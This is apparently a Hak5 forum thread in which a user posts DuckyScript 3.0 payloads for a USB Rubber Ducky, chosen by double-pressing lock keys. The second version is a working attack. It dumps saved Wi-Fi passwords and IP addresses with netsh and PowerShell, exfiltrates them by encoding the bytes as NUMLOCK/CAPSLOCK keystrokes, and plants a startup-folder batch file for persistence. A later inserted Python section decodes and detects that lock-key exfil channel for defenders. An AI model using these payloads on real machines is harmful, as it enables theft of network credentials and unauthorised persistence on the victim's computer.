RootJunky Posted August 22, 2022

REM Three Payloads from LOCK Key Double Press.
REM Author RootJunky
REM COMPATIBILITY:
REM DuckyScript 3.0

REM SCROLLLOCK
FUNCTION FUN1()
    WAIT_FOR_SCROLL_CHANGE
    STRING Scrolllock pressed
    ENTER
END_FUNCTION

REM NUMLOCK
FUNCTION FUN2()
    WAIT_FOR_NUM_CHANGE
    STRING Numlock pressed
    ENTER
END_FUNCTION

REM CAPSLOCK
FUNCTION FUN3()
    WAIT_FOR_CAPS_CHANGE
    STRING Capslock pressed
    ENTER
END_FUNCTION

REM Place all lock keys in the off state to start the payload correctly.
SAVE_HOST_KEYBOARD_LOCK_STATE
DELAY 500
IF ( $_NUMLOCK_ON == TRUE ) THEN
    NUMLOCK
    DELAY 500
END_IF
IF ( $_SCROLLLOCK_ON == TRUE ) THEN
    SCROLLLOCK
    DELAY 500
END_IF
IF ( $_CAPSLOCK_ON == TRUE ) THEN
    CAPSLOCK
    DELAY 500
END_IF

REM Constantly monitor scrolllock, numlock, and capslock keys with a while loop.
WHILE TRUE
    REM Call FUNCTION 1 with scrolllock press.
    IF ($_SCROLLLOCK_ON == TRUE) THEN
        FUN1()
    REM Call FUNCTION 2 with numlock press.
    ELSE IF ($_NUMLOCK_ON == TRUE) THEN
        FUN2()
    REM Call FUNCTION 3 with capslock press.
    ELSE IF ($_CAPSLOCK_ON == TRUE) THEN
        FUN3()
    END_IF
END_WHILE

This is a fun little menu system I wrote that allows you to use the lock keys to select from 3 different payloads. Just double press capslock, numlock, or scrolllock to select the payload you want to run on the target machine. Using this method you are still able to use the button on the rubber ducky to place it in USB Storage mode. I would attach an inject.bin file but there is no point as you will want to add your payloads to each of the functions 1, 2, and 3. NOTE: if the button on the ducky does not respond it is because you are waiting for another button press, and normally a numlock will clear it and then you can mount USB storage.
RootJunky Posted September 2, 2022

REM Three Payloads from LOCK Key Double Press.
REM Author: RootJunky
REM COMPATIBILITY: Windows
REM DuckyScript 3.0

REM Set password
DEFINE PASS mypassword

REM Stop and start the while loop during payload execution with VAR 1 and 2.
VAR $stopstart = 1

REM SCROLLLOCK Payload
FUNCTION FUN1()
    $stopstart = 2
    WAIT_FOR_SCROLL_CHANGE
    DELAY 1000
    STRING PASS
    ENTER
    LED_R
    DELAY 1000
    LED_OFF
    $stopstart = 1
END_FUNCTION

REM NUMLOCK Payload
FUNCTION FUN2()
    $stopstart = 2
    WAIT_FOR_NUM_CHANGE
    DELAY 500
    GUI r
    DELAY 1000
    STRING Powershell
    DELAY 500
    ENTER
    DELAY 1000
    STRING $computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content
    ENTER
    STRING $PublicIP = "Your-Public-IP-Address"
    ENTER
    STRING $LocalIP = "Your-Local-IP-Address"
    ENTER
    STRING $computerIP = get-WmiObject Win32_NetworkAdapterConfiguration|Where {$_.Ipaddress.length -gt 1}
    ENTER
    STRING $Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "DHCPEnabled=$True" | ? {$_.IPEnabled}
    ENTER
    STRING $Wifi = (netsh wlan show profiles) | Select-String ":(.+)$" | % {$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | % {$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize
    ENTER
    STRING $Wifi + $PublicIP + $computerPubIP + $LocalIP + $Networks.ipaddress[0] > $env:tmp\z
    ENTER
    STRING clear
    ENTER
    SAVE_HOST_KEYBOARD_LOCK_STATE
    STRING $Wifi + $PublicIP + $computerPubIP + $LocalIP + $Networks.ipaddress[0] + (echo "Press NUMLOCK now to EXFIL this data, you have 5 seconds.")
    ENTER
    STRING timeout 5
    ENTER
    DELAY 6000
    STRING EXIT
    REM This only runs if NUMLOCK is pressed in the 5 second window.
    IF $_NUMLOCK_ON THEN
        $_EXFIL_MODE_ENABLED = TRUE
        $_EXFIL_LEDS_ENABLED = TRUE
        REM Convert the stored credentials into CAPSLOCK and NUMLOCK values.
        GUI r
        DELAY 100
        STRING powershell "foreach($b in $(cat $env:tmp\z -En by)){foreach($a in 0x80,
        STRING 0x40,0x20,0x10,0x08,0x04,0x02,0x01){if($b-band$a){$o+='%{NUMLOCK}'}else
        STRING {$o+='%{CAPSLOCK}'}}};$o+='%{SCROLLLOCK}';echo $o >$env:tmp\z"
        ENTER
        DELAY 100
        REM Use powershell to inject the CAPSLOCK and NUMLOCK values to the Ducky.
        GUI r
        DELAY 100
        STRING powershell "$o=(cat $env:tmp\z);Add-Type -A System.Windows.Forms;
        STRING [System.Windows.Forms.SendKeys]::SendWait($o);rm $env:tmp\z"
        ENTER
        DELAY 100
        REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete.
        WAIT_FOR_SCROLL_CHANGE
        LED_G
        $_EXFIL_MODE_ENABLED = FALSE
        RESTORE_HOST_KEYBOARD_LOCK_STATE
    END_IF
    LED_R
    DELAY 1000
    LED_OFF
    $stopstart = 1
END_FUNCTION

REM CAPSLOCK Payload
FUNCTION FUN3()
    $stopstart = 2
    WAIT_FOR_CAPS_CHANGE
    DELAY 500
    GUI r
    DELAY 500
    STRING cmd
    DELAY 500
    ENTER
    DELAY 1000
    STRING ECHO echo off > "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\rickroll.bat"
    DELAY 500
    ENTER
    STRING ECHO mode con:cols=30 lines=10 >> "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\rickroll.bat"
    DELAY 500
    ENTER
    STRING ECHO start https://youtu.be/sXwaRjU7Tj0?t=57 >> "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\rickroll.bat"
    DELAY 500
    ENTER
    STRING ECHO exit >> "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\rickroll.bat"
    DELAY 500
    ENTER
    STRING exit
    ENTER
    LED_R
    DELAY 1000
    LED_OFF
    $stopstart = 1
END_FUNCTION

REM Place all lock keys in the off state to start the payload correctly.
FUNCTION SETUP()
    SAVE_HOST_KEYBOARD_LOCK_STATE
    DELAY 500
    IF ( $_NUMLOCK_ON == TRUE ) THEN
        NUMLOCK
        DELAY 500
    END_IF
    IF ( $_SCROLLLOCK_ON == TRUE ) THEN
        SCROLLLOCK
        DELAY 500
    END_IF
    IF ( $_CAPSLOCK_ON == TRUE ) THEN
        CAPSLOCK
        DELAY 500
    END_IF
END_FUNCTION

REM SCROLLLOCK on at ducky startup shows the button description.
SAVE_HOST_KEYBOARD_LOCK_STATE
DELAY 1000
IF ( $_SCROLLLOCK_ON == TRUE ) THEN
    DELAY 500
    GUI r
    DELAY 1000
    STRING powershell
    DELAY 500
    ENTER
    DELAY 1000
    STRING $groups = ('CAPSLOCK = RickRoll','SCROLLLOCK = Password','NUMLOCK = WiFi Password and EXFIL','Double press any of these keys to run the payloads.')
    ENTER
    STRING $groups = $groups -join "`n- "
    ENTER
    STRING powershell -WindowStyle hidden -Command "& {[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); [System.Windows.Forms.MessageBox]::Show('- $groups','DUCKY USAGE')}"
    ENTER
    SETUP()
ELSE
    SETUP()
END_IF

REM Constantly monitor scrolllock, numlock, and capslock keys with a while loop.
WHILE ( $stopstart == 1 )
    REM Call FUNCTION 1 with scrolllock press.
    IF ($_SCROLLLOCK_ON == TRUE) THEN
        FUN1()
    REM Call FUNCTION 2 with numlock press.
    ELSE IF ($_NUMLOCK_ON == TRUE) THEN
        FUN2()
    REM Call FUNCTION 3 with capslock press.
    ELSE IF ($_CAPSLOCK_ON == TRUE) THEN
        FUN3()
    END_IF
END_WHILE

Version 2 includes some payloads for fun and a mid-payload option to enable exfil of wifi passwords and SSIDs if wanted. Also, if you turn on scroll lock before plugging in the ducky it will give you a popup with Ducky usage instructions, but only if scroll lock is turned on when plugging it into the PC. Just having fun using as many Ducky Script 3.0 options as I can in this payload.
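A defender-side view of the lock-key channel used by the NUMLOCK payload above (and of the lock-key menu from the first post): the Ducky's only input from the host is lock-state changes, so the exfil shows up on the host as a burst of NUMLOCK/CAPSLOCK presses ending in SCROLLLOCK. The Python below is an added example, not RootJunky's code; it assumes a host-side key-event trace of (timestamp, key name) pairs such as an input-event logger or EDR might produce, and the sample trace is constructed. It decodes such a trace back into the bytes that left the host, for incident response, and flags the burst by its inhuman keystroke rate.

```python
from dataclasses import dataclass
from typing import Iterable, List

NUMLOCK, CAPSLOCK, SCROLLLOCK = "NUMLOCK", "CAPSLOCK", "SCROLLLOCK"
LOCK_KEYS = {NUMLOCK, CAPSLOCK, SCROLLLOCK}

@dataclass
class LockEvent:
    ts: float  # seconds (assumed trace format: timestamp plus key name)
    key: str

def decode_channel(events: Iterable[LockEvent]) -> bytes:
    """Rebuild the bytes pushed through the lock keys. Encoding as in the
    payload above: each byte MSB-first, one press per bit, NUMLOCK = 1 and
    CAPSLOCK = 0; SCROLLLOCK terminates the transfer. Other keys are ignored
    and an incomplete trailing byte is discarded."""
    out, bits = bytearray(), []
    for ev in events:
        if ev.key == SCROLLLOCK:
            break
        if ev.key in (NUMLOCK, CAPSLOCK):
            bits.append(1 if ev.key == NUMLOCK else 0)
            if len(bits) == 8:
                out.append(int("".join(map(str, bits)), 2))
                bits.clear()
    return bytes(out)

def is_machine_burst(events: Iterable[LockEvent], min_run: int = 16,
                     max_gap: float = 0.05) -> bool:
    """Detection heuristic (assumed thresholds): SendKeys.SendWait toggles lock
    keys milliseconds apart, so min_run or more consecutive lock-key presses
    each no more than max_gap seconds apart is not a human at the keyboard."""
    run, last_ts = 0, None
    for ev in events:
        if ev.key not in LOCK_KEYS:
            run, last_ts = 0, None
            continue
        run = run + 1 if last_ts is not None and ev.ts - last_ts <= max_gap else 1
        if run >= min_run:
            return True
        last_ts = ev.ts
    return False

def constructed_trace(bit_pattern: str, interval: float = 0.016) -> List[LockEvent]:
    """Constructed sample, not a real capture: a bit string becomes presses
    about 16 ms apart, followed by the SCROLLLOCK terminator."""
    keys = [NUMLOCK if b == "1" else CAPSLOCK for b in bit_pattern.replace(" ", "")]
    keys.append(SCROLLLOCK)
    return [LockEvent(round(i * interval, 3), k) for i, k in enumerate(keys)]
```

Feeding `constructed_trace("01001000 01101001")` to both functions yields the bytes `b"Hi"` and a positive burst verdict; three lock presses seconds apart decode to nothing and are not flagged.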
Darren Kitchen Posted September 4, 2022

Fantastic. Love the creativity. You should totally submit a pull request to https://github.com/hak5/usbrubberducky-payloads
RootJunky Posted September 4, 2022 (edited)

15 hours ago, Darren Kitchen said:
    Fantastic. Love the creativity. You should totally submit a pull request to https://github.com/hak5/usbrubberducky-payloads

Done :-) Glad you like it. I had fun creating it. Adding those lock keys to Ducky Script 3.0 changes everything, and the exfil is super cool even though it takes a long time.

Edited September 4, 2022 by RootJunky